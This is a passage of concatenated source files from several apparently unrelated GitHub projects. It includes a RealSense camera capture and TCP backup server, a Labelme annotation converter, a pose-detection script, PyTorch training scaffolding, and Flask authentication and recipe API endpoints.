x_points, y_points = [[(int(i)+2600)*0.13 for i in a[0]],[(int(i)+2600)*0.13 for i in a[1]]]
return x_points, y_points
``` |
{
"source": "a2819z/pytorch-template",
"score": 2
} |
#### File: pytorch-template/models/model.py
```python
import torch.nn as nn
from .encoder import Encoder
from .decoder import Decoder
class Generator(nn.Module):
def __init__(self, cfg):
super(Generator, self).__init__()
self.content_enc = Encoder(cfg.content_enc)
self.style_enc = Encoder(cfg.style_enc)
self.decoder = Decoder(cfg.decoder)
def forward(self, content, styles, interpolation_weight=None):
x = self.content_enc(content)
style_features = []
for style in styles:
s, s_features = self.style_enc(style)
s_features.reverse() # Reordering style features for decoding
s_features.append(s)
style_features.append(s_features)
x = self.decoder(x, style_features, interpolation_weight)
return x
```
#### File: pytorch-template/trainer/base_trainer.py
```python
from abc import abstractmethod
from torch.cuda import amp
from torch.nn.parallel import DistributedDataParallel as DDP
import torch.nn.functional as F
from utils.torch_utils import ModelEMA, is_main_worker
class BaseTrainer:
def __init__(self, model, optimizer, writer, logger, evaluator, test_loader, cfg):
self.model = model
self.ema = ModelEMA(self.model) if is_main_worker(cfg.gpu) else None
self.optimizer = optimizer
self.scaler = amp.GradScaler(enabled=cfg.amp)
self.cfg = cfg
self.model = self.set_ddp(self.model)
self.tb_writer = writer
self.logger = logger
self.evaluator = evaluator
self.test_loader = test_loader
self.losses = {}
def set_ddp(self, model):
if self.cfg.use_ddp:
return DDP(model, device_ids=[self.cfg.gpu], output_device=self.cfg.gpu)
return model
def clear_losses(self):
self.losses = {}
@abstractmethod
def train(self):
raise NotImplementedError
def sync_ema(self):
if self.ema is not None:
self.ema.update(self.model)
def save_checkpoint(self):
pass
``` |
{
"source": "a2824256/capture_server",
"score": 2
} |
#### File: a2824256/capture_server/server.py
```python
import socket
# intelrealsense驱动库
import pyrealsense2 as rs
import numpy as np
import cv2
import json
import png
import datetime
import os
import struct
import time
from socket import gethostbyname, gethostname
from threading import Lock, Thread
socket.setdefaulttimeout(10)
# 请求头数据
pipeline = None
STORE_PATH = './img'
buffer = 1024
headCode = b'\xff\xff\xff\xff'
MSG_Heart = '0000'
MSG_Save = '0200'
MSG_Video_Save = '0400'
MSG_Video_Stop = '0600'
MSG_Backup = '0800'
MSG_Open_DepthCamera = '0a00'
MSG_Heart_Ack_Msg_id = b'\x01\x00'
MSG_Save_Ack_Msg_id = b'\x03\x00'
MSG_Save_Start_Ack = b'\x05\x00'
MSG_Save_Stop_Ack = b'\x07\x00'
MSG_Backup_Ack = b'\x09\x00'
MSG_Open_DepthCamera_Ack = b'\x0b\x00'
Crc_test = b'\x00'
Reserved_test = b'\x00'
capture_number = 1
status = 0
# 视频采集
global_nd_rgb = None
global_nd_depth = None
STOP_SIG = False
FIRST_TIPS = True
RECORD_STOP_SIG = False
FPS = 30.0
FILE_COUNTER = 0
CAMERA_IS_OPEN = False
BACKUP_IN_PROGRESS = False
CAPTURE_IN_PROGRESS = False
RECORD_IN_PROGRESS = False
def upload_files():
global FILE_COUNTER, BACKUP_IN_PROGRESS
BACKUP_IN_PROGRESS = True
print("备份开始\n")
try:
sk = socket.socket()
sk.connect(('172.18.6.8', 60000))
for _, dirs, _ in os.walk(STORE_PATH):
for dir in dirs:
if dir != '':
path = os.path.join(STORE_PATH, dir)
for _, _, files in os.walk(path):
for file in files:
FILE_COUNTER += 1
for _, dirs, _ in os.walk(STORE_PATH):
for dir in dirs:
if dir != '':
for _, _, files in os.walk(os.path.join(STORE_PATH, dir)):
for file in files:
send_file(sk, dir, file)
content = sk.recv(4)
try:
content = content.decode('utf-8')
if '0' in content:
os.remove(os.path.join(STORE_PATH, dir, file))
except:
print("返回状态码异常", content)
continue
time.sleep(1)
content = '上传结束\n'
print(content)
FILE_COUNTER = 0
BACKUP_IN_PROGRESS = False
except:
import traceback
traceback.print_exc()
BACKUP_IN_PROGRESS = False
def send_file(sk, file_path, filename):
head = {'l': FILE_COUNTER,
'filepath': file_path,
'filename': filename,
'filesize': None}
file_path = os.path.join(STORE_PATH, file_path, head['filename'])
# 计算文件的大小
filesize = os.path.getsize(file_path)
head['filesize'] = filesize
json_head = json.dumps(head) # 利用json将字典转成字符串
bytes_head = json_head.encode('utf-8') # 字符串转bytes
# 计算head长度
head_len = len(bytes_head) # 报头的长度
# 利用struct将int类型的数据打包成4个字节的byte,所以服务器端接受这个长度的时候可以固定缓冲区大小为4
pack_len = struct.pack('i', head_len)
# 先将报头长度发出去
sk.send(pack_len)
# 再发送bytes类型的报头
sk.send(bytes_head)
with open(file_path, 'rb') as f:
while filesize:
if filesize >= buffer:
content = f.read(buffer) # 每次读取buffer字节大小内容
filesize -= buffer
sk.send(content) # 发送读取的内容
else:
content = f.read(filesize)
sk.send(content)
filesize = 0
f.close()
break
# 创建文件夹函数
# path:要创建的文件夹路径
def mkdir(path):
path = path.strip()
path = path.rstrip("/")
isExists = os.path.exists(path)
if not isExists:
os.makedirs(path)
return True
else:
return False
# 字符串左侧填充0函数
# str:字符串
# bits:字符串最终要达到的位数
def fitzero(str, bits):
length = len(str)
if length < bits:
for i in range(bits - length):
str = '0' + str
return str
# 获取对齐的rgb与深度图
def get_aligned_images(pipeline, align):
# 等待获取单帧数据
frames = pipeline.wait_for_frames()
# 获取对齐后的单帧数据
aligned_frames = align.process(frames)
# 获取对齐后的深度帧
aligned_depth_frame = aligned_frames.get_depth_frame()
# 获取对齐后的彩色帧
color_frame = aligned_frames.get_color_frame()
# 获取深度图和彩色图,类型为ndarray
depth_image = np.asanyarray(aligned_depth_frame.get_data())
color_image = np.asanyarray(color_frame.get_data())
return color_image, depth_image
def make_patient_dir(json_obj):
# 获取patientid
patientid = json_obj['patientId']
# 获取caseid
caseid = json_obj['caseId']
# 获取当前时间戳
# now = datetime.datetime.now()
# 创建本次采样的路径
file_path = STORE_PATH + '/' + str(patientid) + '_' + str(caseid) + '/'
# 创建文件夹
return mkdir(file_path), file_path
# 获取返回结果
# data:数据包
# pipeline:intelrealsense管道
# align:对齐数据流对象
def get_return(data):
global FIRST_TIPS, CAMERA_IS_OPEN
# length: 96 bits
# 使用全局的status变量
global status, global_nd_rgb, global_nd_depth
# 获取请求头
header = data[:12]
# 获取msg_id
msg_id = header.hex()[16:20]
if str(msg_id) != '0000':
print(msg_id)
MSG_id_bytes = MSG_Heart_Ack_Msg_id
if CAMERA_IS_OPEN:
if type(global_nd_rgb) == np.ndarray:
if FIRST_TIPS:
print('camera initialization successful')
FIRST_TIPS = False
else:
status = 0
global CAPTURE_IN_PROGRESS
if msg_id == MSG_Save and CAPTURE_IN_PROGRESS is False:
CAPTURE_IN_PROGRESS = True
MSG_id_bytes = MSG_Save_Ack_Msg_id
try:
# 获取content
body = data[12:]
if len(body) > 0:
# 字符串转json
body_obj = json.loads(body)
print("json:", body_obj)
# 将摄像头设置为采集中状态
status = 1
res, file_path = make_patient_dir(body_obj)
# 采集20对深度图和rgb图
for i in range(capture_number):
# 获取深度图和rgb图
color_image, depth_image = global_nd_rgb, global_nd_depth
# 创建16图像writer
writer16 = png.Writer(width=depth_image.shape[1], height=depth_image.shape[0],
bitdepth=16, greyscale=True)
print(file_path)
# 保存rgb图
cv2.imwrite(file_path + str(i) + '_rgb.jpg', color_image)
# 保存16位深度图
with open(file_path + str(i) + '_depth.jpg', 'wb') as f:
zgray2list = depth_image.tolist()
writer16.write(f, zgray2list)
status = 0
CAPTURE_IN_PROGRESS = False
except:
print('error')
import traceback
traceback.print_exc()
status = 0
CAPTURE_IN_PROGRESS = False
elif msg_id == MSG_Video_Save:
MSG_id_bytes = MSG_Save_Start_Ack
if RECORD_IN_PROGRESS is False and CAMERA_IS_OPEN is True:
print("收到开始录制信号")
body = data[12:]
if len(body) > 0:
# 字符串转json
body_obj = json.loads(body)
print("json:", body_obj)
# 将摄像头设置为采集中状态
res, file_path = make_patient_dir(body_obj)
start_video_record(file_path)
else:
print("视频正在录制无法重复启动线程或摄像头未开启")
elif msg_id == MSG_Video_Stop:
if RECORD_IN_PROGRESS:
global RECORD_STOP_SIG
MSG_id_bytes = MSG_Save_Stop_Ack
RECORD_STOP_SIG = True
print("收到录制结束信号")
else:
print("不在录制状态下,无法结束录制")
else:
status = 4
if msg_id == MSG_Open_DepthCamera:
if CAMERA_IS_OPEN == False:
thread1 = Thread(target=camera_threading)
thread1.start()
status = 0
CAMERA_IS_OPEN = True
else:
print("摄像头已开启")
if msg_id == MSG_Backup:
if BACKUP_IN_PROGRESS is False and RECORD_IN_PROGRESS is False:
MSG_id_bytes = MSG_Backup_Ack
thread_backup = Thread(target=upload_files)
thread_backup.start()
else:
print("系统正在备份")
# 创建一个json对象
json_obj = {}
# json返回的status为当前全局status
json_obj['status'] = status
# json对象转json字符串
json_str = json.dumps(json_obj)
# 计算总包长
total_len = len(bytes(json_str, encoding='utf-8')) + 12
length_bytes = struct.pack("<i", total_len)
# 拼接字节
content = headCode + length_bytes + MSG_id_bytes + Crc_test + Reserved_test + bytes(json_str, encoding='utf-8')
return content
def write_start_log():
file_path = "./log"
file = open(file_path, 'w')
# 获取当前时间戳
now = datetime.datetime.now()
# 格式化时间戳
otherStyleTime = now.strftime("%Y-%m-%d %H:%M:%S")
file.write(otherStyleTime)
file.close()
def start_video_record(path):
thread = Thread(target=video_record_threading, args=(path,))
thread.start()
def video_record_threading(path):
global RECORD_STOP_SIG, RECORD_IN_PROGRESS
RECORD_IN_PROGRESS = True
fourcc = cv2.VideoWriter_fourcc(*'XVID')
t = time.time()
out = cv2.VideoWriter(os.path.join(path, str(t) + '.avi'), fourcc, 30, (640, 480))
try:
ts = datetime.datetime.now()
while True:
if RECORD_STOP_SIG:
break
te = datetime.datetime.now()
sec = te - ts
if int(sec.seconds) > 300:
print(sec.seconds)
print("五分钟时间到,视频录制结束")
break
out.write(global_nd_rgb)
# time.sleep(0.01)
out.release()
print("RECORD_STOP_SIG:", RECORD_STOP_SIG)
print("RECORD_IN_PROGRESS:", RECORD_IN_PROGRESS)
RECORD_STOP_SIG = False
RECORD_IN_PROGRESS = False
print("录制结束")
except:
import traceback
traceback.print_exc()
out.release()
RECORD_STOP_SIG = False
RECORD_IN_PROGRESS = False
print("录制异常结束")
def camera_threading():
print('sub-thread start')
global global_nd_rgb, global_nd_depth, pipeline
try:
# 创建管道
pipeline = rs.pipeline()
# 获取配置设置
config = rs.config()
# 设置深度图
config.enable_stream(rs.stream.depth, 640, 480, rs.format.z16, 60)
# 设置rgb图
config.enable_stream(rs.stream.color, 640, 480, rs.format.bgr8, 60)
# 开启管道
profile = pipeline.start(config)
# 获取彩色流对象
align_to = rs.stream.color
# 获取对齐的流对象
align = rs.align(align_to)
while True:
if STOP_SIG:
pipeline.stop()
print('thread exit')
break
global_nd_rgb, global_nd_depth = get_aligned_images(pipeline, align)
except:
pipeline.stop()
print("camera connect fail")
exit()
# 主函数
if __name__ == '__main__':
# write_start_log()
# socket部分
s = socket.socket()
# --------------测试---------------
# host = '127.0.0.1'
# --------------测试---------------
# 获取局域网ip
host = "172.18.6.6"
print('host:', host)
port = 60000
s.bind((host, port))
s.listen(5)
print('start')
while True:
try:
c, addr = s.accept()
print(addr, " connected")
counter = 0
while True:
try:
all_data = c.recv(12)
if len(all_data) > 0:
# 设置为bytearray
rec_data = bytearray(all_data)
# print(rec_data)
# 获取headCode
head_index = all_data.find(b'\xff\xff\xff\xff')
# 如果headCode在第一位,代表是一个数据包的开始
if head_index == 0:
# 获取当前数据长度
curSize = len(all_data)
# 获取整个数据包的长度,Length部分
allLen = int.from_bytes(rec_data[head_index + 4:head_index + 8], byteorder='little')
# 如果当前长度还没达到数据包的长度
while curSize < allLen:
# 继续获取数据
data = c.recv(1024)
# 将新的数据拼接到当前数据包末尾
all_data += data
# 更新数据包长度
curSize += len(data)
content = get_return(all_data)
# print(content)
# 返回结果信息
c.send(content)
except Exception as e:
# print("error-2l", e)
c.close()
print(addr, " disconnected")
break
except Exception as e:
# print("error-1l", e)
continue
STOP_SIG = True
s.close()
if pipeline is not None:
pipeline.stop()
``` |
{
"source": "a2824256/Labelme-dataset-extension-script",
"score": 3
} |
#### File: a2824256/Labelme-dataset-extension-script/labelme_2_labelimg.py
```python
import os
import glob
import json
from numba import njit
import xml.dom.minidom
from xml.dom import minidom
path = "F:\\0903modeldata\\labels\\"
img_list = glob.glob(path + "*.json")
width = 0
height = 0
# 自行填写当前文件夹,假如文件路径分割数组长度为1
folder = ""
def get_annotation(labels):
res = []
for i in range(len(labels)):
bndbox = get_bndbox(labels[i]['points'])
res.append([labels[i]['label'], bndbox])
return res
def get_bndbox(list):
global width, height
xmin = width
ymin = height
xmax = 0
ymax = 0
for i in range(len(list)):
if list[i][0] > xmax:
xmax = int(list[i][0])
if list[i][0] < xmin:
xmin = int(list[i][0])
if list[i][1] > ymax:
ymax = int(list[i][1])
if list[i][1] < ymin:
ymin = int(list[i][1])
return [xmin, ymin, xmax, ymax]
for i in range(len(img_list)):
json_path = img_list[i]
is_exists = os.path.exists(json_path)
if is_exists:
# 打开json文件
f = open(json_path, encoding='utf-8')
# 读取json
content = json.load(f)
width = content['imageWidth']
height = content['imageHeight']
labels = content['shapes']
labels = get_annotation(labels)
image_path = content['imagePath']
path_array = image_path.split('\\')
length = len(path_array)
if length < 1:
continue
elif length > 1:
folder = path_array[0]
impl = minidom.getDOMImplementation()
# 创建根节点
dom = impl.createDocument(None, 'annotation', None)
root = dom.documentElement
# folder
nameE = dom.createElement('folder')
nameT = dom.createTextNode(folder)
nameE.appendChild(nameT)
root.appendChild(nameE)
# filename
nameE = dom.createElement('filename')
nameT = dom.createTextNode(path_array[len(path_array)-1])
nameE.appendChild(nameT)
root.appendChild(nameE)
# path
nameE = dom.createElement('path')
nameT = dom.createTextNode(image_path)
nameE.appendChild(nameT)
root.appendChild(nameE)
# source
nameE = dom.createElement('source')
# sub - database
nameE_sub = dom.createElement('database')
nameT_sub = dom.createTextNode("Unknown")
nameE_sub.appendChild(nameT_sub)
nameE.appendChild(nameE_sub)
root.appendChild(nameE)
# size
nameE = dom.createElement('size')
# sub - width
nameE_sub = dom.createElement('width')
nameT_sub = dom.createTextNode(str(width))
nameE_sub.appendChild(nameT_sub)
nameE.appendChild(nameE_sub)
root.appendChild(nameE)
# sub - height
nameE_sub = dom.createElement('height')
nameT_sub = dom.createTextNode(str(height))
nameE_sub.appendChild(nameT_sub)
nameE.appendChild(nameE_sub)
root.appendChild(nameE)
# sub - depth
nameE_sub = dom.createElement('depth')
nameT_sub = dom.createTextNode('3')
nameE_sub.appendChild(nameT_sub)
nameE.appendChild(nameE_sub)
root.appendChild(nameE)
# segmented
nameE = dom.createElement('segmented')
nameT = dom.createTextNode('0')
nameE.appendChild(nameT)
root.appendChild(nameE)
# object - iterator
for obj_i in labels:
# object
nameE = dom.createElement('object')
# sub - name
nameE_sub = dom.createElement('name')
nameT_sub = dom.createTextNode(obj_i[0])
nameE_sub.appendChild(nameT_sub)
nameE.appendChild(nameE_sub)
# sub - pose
nameE_sub = dom.createElement('pose')
nameT_sub = dom.createTextNode('Unspecified')
nameE_sub.appendChild(nameT_sub)
nameE.appendChild(nameE_sub)
# sub - truncated
nameE_sub = dom.createElement('truncated')
nameT_sub = dom.createTextNode('0')
nameE_sub.appendChild(nameT_sub)
nameE.appendChild(nameE_sub)
# sub - difficult
nameE_sub = dom.createElement('difficult')
nameT_sub = dom.createTextNode('0')
nameE_sub.appendChild(nameT_sub)
nameE.appendChild(nameE_sub)
# sub - bndbox
nameE_sub = dom.createElement('bndbox')
# sub2 - xmin
nameE_sub2 = dom.createElement('xmin')
nameT_sub2 = dom.createTextNode(str(obj_i[1][0]))
nameE_sub2.appendChild(nameT_sub2)
nameE_sub.appendChild(nameE_sub2)
# sub2 - ymin
nameE_sub2 = dom.createElement('ymin')
nameT_sub2 = dom.createTextNode(str(obj_i[1][1]))
nameE_sub2.appendChild(nameT_sub2)
nameE_sub.appendChild(nameE_sub2)
# sub2 - xmax
nameE_sub2 = dom.createElement('xmax')
nameT_sub2 = dom.createTextNode(str(obj_i[1][2]))
nameE_sub2.appendChild(nameT_sub2)
nameE_sub.appendChild(nameE_sub2)
# sub2 - ymax
nameE_sub2 = dom.createElement('ymax')
nameT_sub2 = dom.createTextNode(str(obj_i[1][3]))
nameE_sub2.appendChild(nameT_sub2)
nameE_sub.appendChild(nameE_sub2)
nameE.appendChild(nameE_sub)
root.appendChild(nameE)
new_file = path_array[len(path_array)-1].replace('jpg', 'xml')
new_file = "F:\\0903modeldata\\xml\\" + new_file
f = open(new_file, 'w')
dom.writexml(f, addindent=' ', newl='\n', encoding='utf-8')
f.close()
print(new_file + ' - 已生成')
else:
print(json_path + " - 没有该文件")
``` |
{
"source": "a2824256/pyrealsense_collection",
"score": 3
} |
#### File: a2824256/pyrealsense_collection/main.py
```python
import png
import pyrealsense2 as rs
import logging
logging.basicConfig(level=logging.INFO)
import numpy as np
import cv2
import os
def make_directories():
if not os.path.exists("JPEGImages/"):
os.makedirs("JPEGImages/")
if not os.path.exists("depth/"):
os.makedirs("depth/")
if not os.path.exists("8bit_depth/"):
os.makedirs("8bit_depth/")
if __name__ == "__main__":
make_directories()
pipeline = rs.pipeline()
config = rs.config()
config.enable_stream(rs.stream.depth, 640, 480, rs.format.z16, 30)
config.enable_stream(rs.stream.color, 640, 480, rs.format.bgr8, 30)
profile = pipeline.start(config)
frames = pipeline.wait_for_frames()
color_frame = frames.get_color_frame()
intr = color_frame.profile.as_video_stream_profile().intrinsics
align_to = rs.stream.color
align = rs.align(align_to)
number = 0
while True:
filecad = "JPEGImages/%s.jpg" % number
filedepth = "depth/%s.png" % number
filedepth_8b = "8bit_depth/%s.png" % number
frames = pipeline.wait_for_frames()
aligned_frames = align.process(frames)
aligned_depth_frame = aligned_frames.get_depth_frame()
color_frame = aligned_frames.get_color_frame()
if not aligned_depth_frame or not color_frame:
continue
d = np.asanyarray(aligned_depth_frame.get_data())
d8 = cv2.convertScaleAbs(d, alpha=0.3)
pos = np.where(d8 == 0)
d8[pos] = 255
c = np.asanyarray(color_frame.get_data())
cv2.imshow('COLOR IMAGE', c)
if cv2.waitKey(1) & 0xFF == ord('q'):
cv2.imwrite(filecad, c)
writer16 = png.Writer(width=d.shape[1], height=d.shape[0],
bitdepth=16, greyscale=True)
writer8 = png.Writer(width=d.shape[1], height=d.shape[0],
bitdepth=8, greyscale=True)
with open(filedepth, 'wb') as f:
zgray2list = d.tolist()
writer16.write(f, zgray2list)
with open(filedepth_8b, 'wb') as f2:
zgray2list_b8 = d8.tolist()
writer8.write(f2, zgray2list_b8)
number += 1
cv2.destroyAllWindows()
``` |
{
"source": "a2824256/singleshotpose_imp",
"score": 2
} |
#### File: a2824256/singleshotpose_imp/realtime.py
```python
from torchvision import datasets, transforms
# from torch.utils.data import Dataset, DataLoader
import scipy.io
import warnings
# from PIL import Image
# import trimesh
# import cv2
import wx
# from pynput import keyboard
warnings.filterwarnings("ignore")
import matplotlib.pyplot as plt
import scipy.misc
from darknet import Darknet
# import dataset
from utils import *
# from MeshPly import MeshPly
# import png
import pyrealsense2 as rs
# import json
import logging
logging.basicConfig(level=logging.INFO)
import numpy as np
import cv2
import time
import os
def valid(datacfg, modelcfg, weightfile):
# 内部函数
def truths_length(truths, max_num_gt=50):
for i in range(max_num_gt):
if truths[i][1] == 0:
return i
# Parse configuration files
data_options = read_data_cfg(datacfg)
# 备份权重文件夹
backupdir = data_options['backup']
# 选择使用哪个GPU
gpus = data_options['gpus']
# 图像尺寸
im_width = int(data_options['width'])
im_height = int(data_options['height'])
# 判断备份文件夹是否存在
if not os.path.exists(backupdir):
makedirs(backupdir)
# ---------------real time detection start---------------
pipeline = rs.pipeline()
config = rs.config()
config.enable_stream(rs.stream.depth, 640, 480, rs.format.z16, 30)
config.enable_stream(rs.stream.color, 640, 480, rs.format.rgb8, 30)
pipeline.start(config)
# profile = pipeline.start(config)
pipeline.wait_for_frames()
# frames = pipeline.wait_for_frames()
# color_frame = frames.get_color_frame()
# intr = color_frame.profile.as_video_stream_profile().intrinsics
# camera_parameters = {'fx': intr.fx, 'fy': intr.fy,
# 'ppx': intr.ppx, 'ppy': intr.ppy,
# 'height': intr.height, 'width': intr.width,
# 'depth_scale': profile.get_device().first_depth_sensor().get_depth_scale()
# }
align_to = rs.stream.color
align = rs.align(align_to)
# ---------------real time detection end---------------
# Parameters
seed = int(time.time())
os.environ['CUDA_VISIBLE_DEVICES'] = gpus
# 随机种子
torch.cuda.manual_seed(seed)
# 是否可视化显示
visualize = True
# 类别数量
num_classes = 1
# 边角,绘图连线用,将对应的两个点连成线段
edges_corners = [[1, 5], [2, 6], [3, 7], [4, 8], [1, 2], [1, 3], [2, 4], [3, 4], [5, 6], [5, 7], [6, 8], [7, 8]]
preds_corners2D = []
# 初始化网络
model = Darknet(modelcfg)
# 打印网络结构
# model.print_network()
# 载入权重
model.load_weights(weightfile)
# 使用cuda加速
model.cuda()
model.eval()
num_keypoints = model.num_keypoints
# label数量 = 关键点x3 + 3
# num_labels = num_keypoints * 2 + 3
frames = pipeline.wait_for_frames()
aligned_frames = align.process(frames)
aligned_depth_frame = aligned_frames.get_depth_frame()
color_frame = aligned_frames.get_color_frame()
if not aligned_depth_frame or not color_frame:
exit()
# d = np.asanyarray(aligned_depth_frame.get_data())
c = np.asanyarray(color_frame.get_data())
# cv2.imwrite('test.png', c)
if cv2.waitKey(1) & 0xFF == ord('q'):
pipeline.stop()
# ------------------take picture end------------------
# -----------------------单图start-------------------------------
# 图片预处理代码
transform = transforms.Compose([transforms.ToTensor(), ])
pic_tensor = transform(c)
# exit()
# 张量增加一维对齐原算法tensor维度
pic_tensor = pic_tensor[np.newaxis, :]
# label预处理
# 来自原算法默认设置
# num_keypoints = 9
# 来自原算法默认设置
# max_num_gt = 50
# 来自原算法默认设置
# num_labels = 2 * num_keypoints + 3 # +2 for ground-truth of width/height , +1 for class label
# label = torch.zeros(max_num_gt * num_labels)
# tmp = torch.from_numpy(read_truths_args(labelfile))
# tmp = tmp.view(-1)
# tsz = tmp.numel()
# if tsz > max_num_gt * num_labels:
# label = tmp[0:max_num_gt * num_labels]
# elif tsz > 0:
# label[0:tsz] = tmp
# -------------------------单图end-----------------------------
# target = label
data = pic_tensor
# Images
img = data[0, :, :, :]
img = img.numpy().squeeze()
img = np.transpose(img, (1, 2, 0))
# Pass data to GPU
data = data.cuda()
# target = target.cuda()
# Wrap tensors in Variable class, set volatile=True for inference mode and to use minimal memory during inference
with torch.no_grad():
data = Variable(data)
# Forward pass
output = model(data).data
all_boxes = get_region_boxes(output, num_classes, num_keypoints)
corners2D_pr = np.array(np.reshape(all_boxes[:18], [9, 2]), dtype='float32')
corners2D_pr[:, 0] = corners2D_pr[:, 0] * im_width
corners2D_pr[:, 1] = corners2D_pr[:, 1] * im_height
preds_corners2D.append(corners2D_pr)
# 可视化代码
if visualize:
# Visualize
plt.xlim((0, im_width))
plt.ylim((0, im_height))
plt.imshow(scipy.misc.imresize(img, (im_height, im_width)))
# Projections
for edge in edges_corners:
plt.plot(corners2D_pr[edge, 0], corners2D_pr[edge, 1], color='b', linewidth=3.0)
plt.gca().invert_yaxis()
plt.show()
datacfg = 'cfg/duck.data'
modelcfg = 'cfg/yolo-pose.cfg'
weightfile = 'backup/duck/model_backup.weights'
valid(datacfg, modelcfg, weightfile)
``` |
{
"source": "a283910020/yummy-rest",
"score": 3
} |
#### File: app/endpoints/auth.py
```python
from datetime import datetime, timedelta
from werkzeug.security import check_password_hash, generate_password_hash
from flask import jsonify, request, make_response
from flask_restplus import Resource
from flask_jwt import jwt
from app import APP
from app.helpers import decode_access_token
from app.helpers.validators import UserSchema
from app.restplus import API
from app.models import db, User, BlacklistToken
from app.serializers import add_user, login_user, password_reset
# Linting exceptions
# pylint: disable=C0103
# pylint: disable=W0702
# pylint: disable=W0703
# pylint: disable=E1101
# pylint: disable=R0201
auth_ns = API.namespace('auth', description="Authentication/Authorization operations.")
@auth_ns.route('/register')
class RegisterHandler(Resource):
"""
This class handles user account creation.
"""
@API.expect(add_user)
def post(self):
"""
Registers a new user account.
"""
data = request.get_json()
# Instanciate user schema
user_schema = UserSchema()
data, errors = user_schema.load(data)
if errors:
response_obj = dict(
errors=errors
)
return make_response(jsonify(response_obj), 422)
# Check if user exists
email = data['email'].lower()
user = User.query.filter_by(email=email).first()
if not user:
try:
new_user = User(
email=data['email'], username=data['username'], password=data['password']
)
db.session.add(new_user)
db.session.commit()
return make_response(jsonify({'message': 'Registered successfully!'}), 201)
except:
response = {"message": "Username already taken, please choose another."}
return make_response(jsonify(response), 401)
else:
response = jsonify({'message': 'User already exists. Please Log in instead.'})
return make_response(response, 400)
@auth_ns.route('/login')
class LoginHandler(Resource):
"""
This class handles user login
"""
@API.expect(login_user)
def post(self):
"""
User Login/SignIn route
"""
login_info = request.get_json()
if not login_info:
return make_response(jsonify({'message': 'Input payload validation failed'}), 400)
try:
user = User.query.filter_by(email=login_info['email']).first()
if not user:
return make_response(jsonify({"message": 'User does not exist!'}), 404)
if check_password_hash(user.password, login_info['password']):
payload = {
'exp': datetime.utcnow() + timedelta(weeks=3),
'iat': datetime.utcnow(),
'sub': user.public_id
}
token = jwt.encode(
payload,
APP.config['SECRET_KEY'],
algorithm='HS256'
)
print(user.username)
return jsonify({"message": "Logged in successfully.",
"access_token": token.decode('UTF-8'),
"username": user.username
})
return make_response(jsonify({"message": "Incorrect credentials."}), 401)
except Exception as e:
print(e)
return make_response(jsonify({"message": "An error occurred. Please try again."}), 501)
@auth_ns.route('/logout')
class LogoutHandler(Resource):
"""
This class handles user logout
"""
def post(self):
"""
Logout route
"""
access_token = request.headers.get('Authorization')
if access_token:
result = decode_access_token(access_token)
if not isinstance(result, str):
# mark the token as blacklisted
blacklisted_token = BlacklistToken(access_token)
try:
# insert the token
db.session.add(blacklisted_token)
db.session.commit()
response_obj = dict(
status="success",
message="Logged out successfully."
)
return make_response(jsonify(response_obj), 200)
except Exception as e:
resp_obj = {
'status': 'fail',
'message': e
}
return make_response(jsonify(resp_obj), 200)
else:
resp_obj = dict(
status="fail",
message=result
)
return make_response(jsonify(resp_obj), 401)
else:
response_obj = {
'status': 'fail',
'message': 'Provide a valid auth token.'
}
return make_response(jsonify(response_obj), 403)
@auth_ns.route('/reset-password')
class PasswordResetResource(Resource):
"""
This class handles the user password reset request
"""
@API.expect(password_reset)
def post(self):
"""
Reset user password
"""
# Request data
data = request.get_json()
# Get specified user
user = User.query.filter_by(public_id=data['public_id']).first()
if user:
if check_password_hash(user.password, data['current_password']):
user.password = <PASSWORD>_password_hash(data['new_password'])
db.session.commit()
resp_obj = dict(
status="Success!",
message="Password reset successfully!"
)
resp_obj = jsonify(resp_obj)
return make_response(resp_obj, 200)
resp_obj = dict(
status="Fail!",
message="Wrong current password. Try again."
)
resp_obj = jsonify(resp_obj)
return make_response(resp_obj, 401)
resp_obj = dict(
status="Fail!",
message="User doesn't exist, check the Public ID provided!"
)
resp_obj = jsonify(resp_obj)
return make_response(resp_obj, 403)
```
#### File: app/endpoints/recipes.py
```python
from flask import request, jsonify, make_response
from flask_restplus import Resource
from webargs.flaskparser import parser
from app.models import db, Recipe
from app.serializers import recipe
from app.restplus import API
from app.helpers import (
authorization_required, _clean_name, _pagination, is_unauthorized,
make_payload
)
from app.helpers.validators import RecipeSchema
from app.parsers import SEARCH_PAGE_ARGS, make_args_parser
# Linting exceptions
# pylint: disable=C0103
# pylint: disable=E0213
# pylint: disable=E1101
# pylint: disable=W0613
recipes_ns = API.namespace(
'recipes', description='The enpoints for recipe manipulation',
path='/category/<int:category_id>/recipes'
)
args_parser = make_args_parser(recipes_ns)
def _does_not_exist():
"""Returns recipe does not exist message"""
response_payload = dict(
message="Recipe does not exist!"
)
response_payload = jsonify(response_payload)
return make_response(response_payload, 404)
@recipes_ns.route('')
class GeneralRecipesHandler(Resource):
"""
This class defines the endpoints for creating a single recipe
in a particular category or retrieving all the recipes in said
category
"""
@authorization_required
@API.expect(recipe)
def post(current_user, self, category_id):
"""
Create a recipe in the specified category
:param int category_id: The id of the category to which recipe should be added
"""
if not current_user:
return is_unauthorized()
request_payload = request.get_json()
request_payload['name'] = _clean_name(request_payload['name'])
# initialize schema object for input validation
recipe_schema = RecipeSchema()
# Validate input
request_payload, errors = recipe_schema.load(request_payload)
# Raise input validation error notification
if errors:
response_payload = dict(
message="You provided some invalid details.",
errors=errors
)
return make_response(jsonify(response_payload), 422)
category = current_user.categories.filter_by(id=category_id).first()
if category:
new_recipe = Recipe(
name=request_payload['name'],
category_id=category_id,
user_id=current_user.id,
ingredients=request_payload['ingredients'],
description=request_payload['description']
)
existing_recipe = category.recipes.filter_by(
name=request_payload['name']
).first()
if not existing_recipe:
db.session.add(new_recipe)
db.session.commit()
response_payload = {
'recipes': [make_payload(recipe=new_recipe)]
}
response_payload = jsonify(response_payload)
return make_response(response_payload, 201)
response_payload = dict(
message='Recipe already exists!'
)
response_payload = jsonify(response_payload)
return make_response(response_payload, 400)
response_payload = dict(
message='Invalid category!'
)
response_payload = jsonify(response_payload)
return make_response(response_payload, 400)
@authorization_required
@recipes_ns.expect(args_parser)
def get(current_user, self, category_id):
"""
Retrives a list of the recipes for the category
:param int category_id: The id of the category whose recipes to be displayed\n
:return str status: The status of the request (Success, Fail)\n
:return list recipes: The recipes in the category
"""
if not current_user:
return is_unauthorized()
category = current_user.categories.filter_by(id=category_id).first()
if category:
recipes = category.recipes.all()
if not recipes:
response_payload = dict(
message='No recipes added to this category yet!'
)
response_payload = jsonify(response_payload)
return make_response(response_payload, 404)
# search and/or paginate
args = parser.parse(SEARCH_PAGE_ARGS, request)
if 'q' in args:
try:
recipes = current_user.recipes.filter(
